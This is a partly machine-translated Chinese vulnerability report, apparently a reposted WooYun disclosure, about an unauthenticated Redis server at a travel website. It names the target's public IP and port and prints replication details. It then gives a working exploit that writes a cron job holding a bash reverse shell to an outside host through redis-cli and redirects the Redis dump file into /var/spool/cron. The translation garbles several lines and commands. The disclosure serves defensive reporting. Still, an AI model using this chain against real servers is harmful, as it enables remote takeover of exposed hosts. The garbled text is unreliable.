漏洞标题 穷游网某服务未授权访问(可远程SHELL) 相关厂商 穷游网 漏洞作者 猪猪侠 提交时间 2016-05-03 12:54 公开时间 2016-06-17 14:10 漏洞类型 未授权访问/…
漏洞标题
差旅差网络服务未授权访问(远程SHELL)
相关制造商
差旅网络
漏洞作者
猪人
提交时间
2016-05-03 12: 54
公共时间
2016-06-17 14: 10
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
漏洞详细信息
#1漏洞参考
WooYun:新浪微博服务器未正确控制(远程SHELL)
#2 redis服务向公众开放
Redis: //115.182.69.199: 3000
#3可以管理奴隶
#Keyspace
Db0: keys=65454963,expires=130654,avg_ttl=30413755756
#Replication
角色:主人
Connected_slaves: 1
Slave0: ip=10.1.1.15,port=6379,state=online,offset=271341594993,lag=1
Master_repl_offset: 271341599570
配置得到目录
94)'/u01/redis/data'
漏洞证明:
650万个密钥,不敢执行flush命令来测试损坏数据,只需证明
#exploit,创建任务计划,执行命令
Echo -e'\ n \ n */1 * * * */bin/bash -i>& /dev/tcp/114.114.114.114/53 0>& 1 \ n \ n'| redis-cli - h 115.182.69.199 -p 3000 -x set 0
配置设置目录/var/spool/cron /
配置set dbfilename root
修理计划:
#Set访问控制
版权声明:转载请注明出处猪猪人@乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 667 )
- 分类:黑客技术